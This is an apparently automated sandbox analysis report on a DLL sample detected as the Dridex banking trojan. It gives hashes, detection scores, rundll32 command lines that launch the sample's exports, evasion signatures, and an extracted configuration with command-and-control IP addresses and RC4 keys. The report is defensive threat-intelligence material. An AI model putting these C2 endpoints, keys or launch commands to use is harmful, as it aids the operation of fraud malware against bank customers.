Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll
Analysis ID:	510679
MD5:	2228471d39760f9a389ac95f71b671a9
SHA1:	38b7d35e72c995ca526e293af9d448a7a8011df6
SHA256:	a9238550f705b9668a390a9e7b9e4dec6a88daec2c8acca19ffa10af328d594d
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Found detection on Joe Sandbox Cloud Basic with higher score

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Launches processes in debugging mode, may be used to hinder debugging

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5868 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 3248 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6404 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6436 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll,FFRgpmdlwwWde MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6900 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',CheckTrust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7144 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 6296 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5404 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 2944 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DownloadFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3892 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',GetICifFileFromFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000C.00000000.680670011.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000D.00000000.682183733.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000002.719392684.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000002.753337263.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000D.00000002.749868846.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.423290755.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000000.698176529.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000009.00000002.780387984.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000000.676132737.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000E.00000000.701129229.000000006E8B1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
13.2.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.0.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.2.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.2.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.0.rundll32.exe.6e8b0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
14.0.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.0.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
13.0.rundll32.exe.6e8b0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 13.2.rundll32.exe.6e8b0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Virustotal: Detection: 20%			Perma Link
Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	ReversingLabs: Detection: 28%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Joe Sandbox ML: detected

Source: 12.0.rundll32.exe.3220000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.2.rundll32.exe.4d34756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.rundll32.exe.33a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.0.rundll32.exe.3b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.2f80000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 4.2.rundll32.exe.29a0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.0.rundll32.exe.4a04756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.rundll32.exe.4484756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.2990000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 11.0.rundll32.exe.47f4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.rundll32.exe.4884756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.2990000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.2.rundll32.exe.3b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 1.2.loaddll32.exe.ce4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.rundll32.exe.3220000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.2.rundll32.exe.29f4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.rundll32.exe.4d34756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.rundll32.exe.2f80000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 11.2.rundll32.exe.2990000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 1.2.loaddll32.exe.7b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 14.0.rundll32.exe.2d60000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 11.2.rundll32.exe.47f4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.rundll32.exe.29f4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.rundll32.exe.36a4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.rundll32.exe.4a04756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.47f4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.405380149.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.645478010.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.405380149.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.645478010.000000004B280000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 149.202.179.100:443
Source: Malware configuration extractor	IPs: 66.147.235.11:6891
Source: Malware configuration extractor	IPs: 81.0.236.89:13786

Source: Joe Sandbox View	ASN Name: HOSTROCKETUS HOSTROCKETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 66.147.235.11 66.147.235.11
Source: Joe Sandbox View	IP Address: 149.202.179.100 149.202.179.100

Source: rundll32.exe, 00000003.00000000.423532537.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.784764544.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.698207139.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.723020912.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.753729339.000000006E8CF000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.713332446.000000006E8CF000.00000002.00020000.sdmp

String found in binary or memory: http://www.vomfass.deDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 9.2.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rundll32.exe.6e8b0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.rundll32.exe.6e8b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.680670011.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.682183733.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.719392684.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.753337263.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.749868846.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.423290755.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.698176529.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.780387984.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.676132737.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.701129229.000000006E8B1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score

Show sources

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Joe Sandbox Cloud Basic: Detection: malicious Score: 76 Threat Name: Dridex

Perma Link

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Binary or memory string: OriginalFilenameddlb.dll vs SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E8B1494	1_2_6E8B1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C0754	4_2_6E8C0754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C9348	4_2_6E8C9348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8B1494	4_2_6E8B1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8B846C	4_2_6E8B846C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C1460	4_2_6E8C1460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8BA52C	4_2_6E8BA52C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C1D58	4_2_6E8C1D58

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C223C NtDelayExecution,	4_2_6E8C223C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8C2840 NtAllocateVirtualMemory,	4_2_6E8C2840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8BBB88 NtClose,	4_2_6E8BBB88

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Virustotal: Detection: 20%
Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	ReversingLabs: Detection: 28%

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll,FFRgpmdlwwWde

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll,FFRgpmdlwwWde
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',CheckTrust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllCanUnloadNow
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DownloadFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',GetICifFileFromFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 652
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll,FFRgpmdlwwWde	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',CheckTrust	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',DownloadFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',GetICifFileFromFile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7144 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 652	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6296
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7144

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF97.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@23/6@0/3

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static file information: File size 1093632 > 1048576

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.405380149.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.645478010.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.405380149.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.645478010.000000004B280000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8BF6CC push esi; mov dword ptr [esp], 00000000h

4_2_6E8BF6CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 389

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 389

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8C0754 GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_6E8C0754

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WERE0CF.tmp.xml.21.dr	Binary or memory string: <arg nm="syspro" val="VMware7,1" />
Source: WERDF95.tmp.WERInternalMetadata.xml.21.dr	Binary or memory string: <SystemManufacturer>VMware, Inc.</SystemManufacturer>
